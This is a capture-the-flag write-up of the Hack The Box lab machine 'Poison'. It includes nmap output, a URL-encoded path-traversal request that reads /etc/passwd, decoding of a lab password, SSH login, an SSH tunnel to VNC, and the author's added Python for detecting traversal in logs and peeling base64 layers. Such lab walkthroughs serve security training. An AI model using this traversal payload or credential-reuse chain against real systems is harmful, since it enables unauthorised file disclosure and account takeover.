A little bit late, but here comes my write-up of another box from Hackthebox called Poison.
Solution
Let’s start the attack by scanning with nmap.
[email protected]:~# nmap -v -sS -A -T4 10.10.10.84
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-08 09:46 EDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 09:46
Completed NSE at 09:46, 0.00s elapsed
Initiating NSE at 09:46
Completed NSE at 09:46, 0.00s elapsed
Initiating Ping Scan at 09:46
Scanning 10.10.10.84 [4 ports]
Completed Ping Scan at 09:46, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 09:46
Completed Parallel DNS resolution of 1 host. at 09:46, 0.01s elapsed
Initiating SYN Stealth Scan at 09:46
Scanning 10.10.10.84 [1000 ports]
Discovered open port 80/tcp on 10.10.10.84
Discovered open port 22/tcp on 10.10.10.84
Increasing send delay for 10.10.10.84 from 0 to 5 due to max_successful_tryno increase to 5
Increasing send delay for 10.10.10.84 from 5 to 10 due to max_successful_tryno increase to 6
Discovered open port 5911/tcp on 10.10.10.84
Completed SYN Stealth Scan at 09:46, 20.35s elapsed (1000 total ports)
Initiating Service scan at 09:46
Scanning 3 services on 10.10.10.84
Completed Service scan at 09:46, 6.12s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.84
Retrying OS detection (try #2) against 10.10.10.84
Retrying OS detection (try #3) against 10.10.10.84
Retrying OS detection (try #4) against 10.10.10.84
Retrying OS detection (try #5) against 10.10.10.84
Initiating Traceroute at 09:46
Completed Traceroute at 09:46, 0.06s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 09:46
Completed Parallel DNS resolution of 2 hosts. at 09:46, 0.01s elapsed
NSE: Script scanning 10.10.10.84.
Initiating NSE at 09:46
Completed NSE at 09:46, 7.17s elapsed
Initiating NSE at 09:46
Completed NSE at 09:46, 1.26s elapsed
Nmap scan report for 10.10.10.84
Host is up (0.041s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey:
| 2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
| 256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_ 256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
5911/tcp open cpdlc?
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=7/8%OT=22%CT=1%CU=40695%PV=Y%DS=2%DC=T%G=Y%TM=5B4215CF
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=109%GCD=1%ISR=10D%TI=Z%CI=Z%II=RI%TS=22)SE
OS:Q(TI=Z%CI=Z%II=RI%TS=21)SEQ(SP=FF%GCD=1%ISR=101%TI=Z%CI=Z%TS=20)SEQ(TI=Z
OS:%CI=Z%TS=1F)OPS(O1=M54DNW6ST11%O2=M54DNW6ST11%O3=M280NW6NNT11%O4=M54DNW6
OS:ST11%O5=M218NW6ST11%O6=M109ST11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=F
OS:FFF%W6=FFFF)ECN(R=Y%DF=Y%T=40%W=FFFF%O=M54DNW6SLL%CC=Y%Q=)T1(R=Y%DF=Y%T=
OS:40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=FFFF%S=O%A=S+%F=AS%O=
OS:M109NW6ST11%RD=0%Q=)T3(R=N)T4(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD
OS:=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0
OS:%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1
OS:(R=Y%DF=N%T=40%IPL=38%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:S%T=40%CD=S)
Uptime guess: 0.000 days (since Sun Jul 8 09:46:43 2018)
Network Distance: 2 hops
IP ID Sequence Generation: All zeros
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd
TRACEROUTE (using port 587/tcp)
HOP RTT ADDRESS
1 50.58 ms 10.10.14.1
2 42.90 ms 10.10.10.84
NSE: Script Post-scanning.
Initiating NSE at 09:46
Completed NSE at 09:46, 0.00s elapsed
Initiating NSE at 09:46
Completed NSE at 09:46, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.73 seconds
Raw packets sent: 1504 (71.306KB) | Rcvd: 1088 (45.674KB)
From here we can see open ssh and http ports. Let’s start by using curl to get the content of the website.
[email protected]:~# curl 10.10.10.84:80
<html>
<body>
<h1>Temporary website to test local .php scripts.</h1>
Sites to be tested: ini.php, info.php, listfiles.php, phpinfo.php
</body>
</html>
<form action="/browse.php" method="GET">
Scriptname: <input type="text" name="file"><br>
<input type="submit" value="Submit">
</form>
Let’s check if this works by entering the file name phpinfo.php, listed on the main page.
http://10.10.10.84/browse.php?file=phpinfo.php
Configuration File (php.ini) Path /usr/local/etc
Loaded Configuration File /usr/local/etc/php.ini
Scan this dir for additional .ini files /usr/local/etc/php
But can we get files other than those shown before? Let’s try that by entering the path to the /etc/passwd file.
http://10.10.10.84/browse.php?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
# $FreeBSD: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
_ypldap:*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
_tss:*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin
messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin
avahi:*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin
cups:*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin
charix:*:1001:1001:charix:/home/charix:/bin/csh
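The traversal above works because browse.php hands the file parameter to the filesystem without restricting it to the four scripts the index page names. As an added example (not code from the box or from the write-up), the Python below shows the two sides of that from a defender's view: the exact-allowlist check the script should have applied, and a scan over access-log lines that flags file= values which escape the allowlist, including double-encoded variants. The log lines, client IP and timestamps are constructed for the demo; only the request targets mirror the write-up.

```python
import re
from pathlib import PurePosixPath
from urllib.parse import parse_qs, unquote, urlsplit

# Scripts the index page says browse.php is meant to serve (taken from the page).
ALLOWED_SCRIPTS = {"ini.php", "info.php", "listfiles.php", "phpinfo.php"}

# Constructed Apache combined-log lines for the demo; the client IP and
# timestamps are made up, the request targets mirror the write-up.
SAMPLE_LOG = """\
10.10.14.5 - - [08/Jul/2018:09:50:01 -0400] "GET /browse.php?file=phpinfo.php HTTP/1.1" 200 5120
10.10.14.5 - - [08/Jul/2018:09:51:12 -0400] "GET /browse.php?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2048
10.10.14.5 - - [08/Jul/2018:09:52:30 -0400] "GET /browse.php?file=%252e%252e/etc/passwd HTTP/1.1" 200 2048
10.10.14.5 - - [08/Jul/2018:09:53:45 -0400] "GET /index.php HTTP/1.1" 200 377
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Undo repeated percent-encoding (%252e -> %2e -> .) before checking."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_file_param(value: str) -> str:
    """Return 'ok', 'traversal' or 'not-allowlisted' for a browse.php file value."""
    decoded = fully_decode(value).replace("\\", "/")
    if decoded.startswith("/") or ".." in PurePosixPath(decoded).parts:
        return "traversal"
    if decoded not in ALLOWED_SCRIPTS:
        return "not-allowlisted"
    return "ok"


def is_allowed_script(value: str) -> bool:
    """The check browse.php should have applied: exact allowlist match only."""
    return classify_file_param(value) == "ok"


def find_suspicious_requests(log_text: str):
    """Scan access-log lines and report file= values that are not allowlisted."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for value in parse_qs(query).get("file", []):
            verdict = classify_file_param(value)
            if verdict != "ok":
                # A 200 on a traversal request means the file was most likely served.
                hits.append((m.group("ip"), m.group("ts"), value, verdict,
                             int(m.group("status"))))
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_requests(SAMPLE_LOG):
        print(hit)
```

The allowlist compares the decoded value against fixed script names rather than trying to strip `..` sequences, which is the part that is easy to get wrong; the scanner decodes more than once so that `%252e` does not slip past a single-pass filter, and it keeps the response status so that a 200 on a traversal request stands out from a blocked attempt.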
Amazing, now we have a full list of users with a potential target called charix, and the ability to view any file on the system. But before looking for misconfigurations, I viewed the other files from the main page, and in listfiles.php there is an interesting find: a file called pwdbackup.txt.
http://10.10.10.84/browse.php?file=listfiles.php
Array ( [0] => . [1] => .. [2] => browse.php [3] => index.php [4] => info.php [5] => ini.php [6] => listfiles.php [7] => phpinfo.php [8] => pwdbackup.txt )
Let’s view it.
http://10.10.10.84/browse.php?file=pwdbackup.txt
This password is secure, it's encoded atleast 13 times.. what could go wrong really..
Now we can decode it 13 times, as specified in the file. We can do it by hand or write a script; it doesn’t matter, as the number of encode operations is small enough.
[email protected]:~# echo "Q2hhcml4ITIjNCU2JjgoMA==
> " | base64 -d
Charix!2#4%6&8(0
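Doing the 13 rounds by hand works, but a short script is less error-prone, especially because the backup file wraps its lines. The following is an added example, not the write-up's own script: it peels base64 layers until the data stops looking like base64 or a ceiling is reached, and it strips the line wrapping before each decode. The nested blob it decodes is constructed inside the block from the recovered value shown above, since the original pwdbackup.txt contents are not reproduced here.

```python
import base64
import binascii
import re

# Base64 alphabet with at most two '=' pads; whitespace is stripped beforehand.
B64_RE = re.compile(rb"^[A-Za-z0-9+/]+={0,2}$")


def looks_like_base64(data: bytes) -> bool:
    """Cheap structural check before attempting a decode."""
    return len(data) % 4 == 0 and B64_RE.match(data) is not None


def decode_layers(blob: bytes, max_layers: int = 13):
    """Peel nested base64 layers, returning (layers_removed, innermost_bytes).

    Stops early if the current data is no longer valid base64, so a bound
    of 13 (the count stated in pwdbackup.txt) is a ceiling, not a requirement.
    """
    current = blob
    layers = 0
    while layers < max_layers:
        compact = b"".join(current.split())  # the backup file wraps long lines
        if not looks_like_base64(compact):
            break
        try:
            current = base64.b64decode(compact, validate=True)
        except binascii.Error:
            break
        layers += 1
    return layers, current


def encode_layers(secret: bytes, layers: int) -> bytes:
    """Constructed helper to build a test input; encodebytes wraps at 76 chars,
    like the line-wrapped blob in the write-up."""
    current = secret
    for _ in range(layers):
        current = base64.encodebytes(current)
    return current


if __name__ == "__main__":
    # Constructed sample: the recovered value from above, wrapped 13 times.
    sample = encode_layers(b"Charix!2#4%6&8(0", 13)
    n, plain = decode_layers(sample)
    print(n, plain.decode())
```

One caveat worth keeping in mind: a plaintext that happens to consist only of base64 characters with a length divisible by four would be decoded one round too far, which is why the loop takes an explicit ceiling instead of running until the decode fails.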
After the last decode we get what looks like a password to the charix account. Let’s try to ssh into the server with those credentials.
[email protected]:~# ssh charix@10.10.10.84
Password for [email protected]:
Last login: Sun Jul 8 16:16:28 2018 from 10.10.14.246
FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017
Welcome to FreeBSD!
Release Notes, Errata: https://www.FreeBSD.org/releases/
Security Advisories: https://www.FreeBSD.org/security/
FreeBSD Handbook: https://www.FreeBSD.org/handbook/
FreeBSD FAQ: https://www.FreeBSD.org/faq/
Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
FreeBSD Forums: https://forums.FreeBSD.org/
Documents installed with the system are in the /usr/local/share/doc/freebsd/
directory, or can be installed later with: pkg install en-freebsd-doc
For other languages, replace "en" with a language code like de or fr.
Show the version of FreeBSD installed: freebsd-version ; uname -a
Please include that output and any error messages when posting questions.
Introduction to manual pages: man man
FreeBSD directory layout: man hier
Edit /etc/motd to change this login announcement.
When you've made modifications to a file in vi(1) and then find that
you can't write it, type ``<ESC>!rm -f %'' then ``:w!'' to force the
write
This won't work if you don't have write permissions to the directory
and probably won't be suitable if you're editing through a symbolic link.
[email protected]:~ % ls -la
total 4728
drwxr-x--- 3 charix charix 512 Jul 8 16:30 .
drwxr-xr-x 3 root wheel 512 Mar 19 16:08 ..
-rw-r----- 1 charix charix 1041 Mar 19 17:16 .cshrc
-rw-rw---- 1 charix charix 0 Jul 8 16:30 .history
-rw-r----- 1 charix charix 254 Mar 19 16:08 .login
-rw-r----- 1 charix charix 163 Mar 19 16:08 .login_conf
-rw-r----- 1 charix charix 379 Mar 19 16:08 .mail_aliases
-rw-r----- 1 charix charix 336 Mar 19 16:08 .mailrc
-rw-r----- 1 charix charix 802 Mar 19 16:08 .profile
-rw-r----- 1 charix charix 281 Mar 19 16:08 .rhosts
-rw-r----- 1 charix charix 849 Mar 19 16:08 .shrc
drwx------ 2 charix charix 512 Jul 8 16:29 .ssh
-rwxr-xr-x 1 charix charix 2211 Jul 8 16:29 kati
-r--r--r-- 1 charix charix 0 Jul 8 16:29 secret
-rw-r----- 1 root charix 166 Mar 19 16:35 secret.zip
-rw-r----- 1 root charix 33 Mar 19 16:11 user.txt
-rw------- 1 charix charix 4734976 Jul 8 16:28 vi.core
[email protected]:~ % cat user.txt
******************************
And we have the first flag. In addition, there are files called secret.zip and secret. I copied the zip using scp and unzipped it with the password of charix, but there was nothing apart from gibberish data.
[email protected]:~# scp charix@10.10.10.84:~/secret.zip secret.zip
Password for [email protected]:
secret.zip 100% 166 3.9KB/s 00:00
[email protected]:~# file secret.zip
secret.zip: Zip archive data, at least v2.0 to extract
[email protected]:~# unzip secret.zip
Archive: secret.zip
[secret.zip] secret password:
extracting: secret
[email protected]:~# cat secret
��[|Ֆ[email protected]:~# file secret
secret: Non-ISO extended-ASCII text, with no line terminators
On further enumeration, I noticed an open connection on port 5901.
[email protected]:~ % netstat -l
Active Internet connections
Proto Recv-Q Send-Q Local Address Foreign Address (state)
tcp4 0 12 localhost.5901 localhost.39582 ESTABLISHED
tcp4 0 0 localhost.39582 localhost.5901 ESTABLISHED
We can try to connect to it with nc in order to identify the service.
[email protected]:~ % nc 127.0.0.1 5901
RFB 003.008
Some protocol called RFB? It’s simply VNC!
First, let’s forward the connection so that we can connect from our local machine.
[email protected]:~# ssh -L 5901:localhost:5901 -N -l charix 10.10.10.84
Password for [email protected]:
The last step came with some struggle, as I could not find the correct password for VNC. But remember the secret file? It’s actually a password file that we can use.
[email protected]:~# vncviewer 127.0.0.1:5901 -p secret
Although I finished and rooted the box, I can fully recommend the video from Ippsec, in which he shows amazing techniques used to attack the box. Go check it out!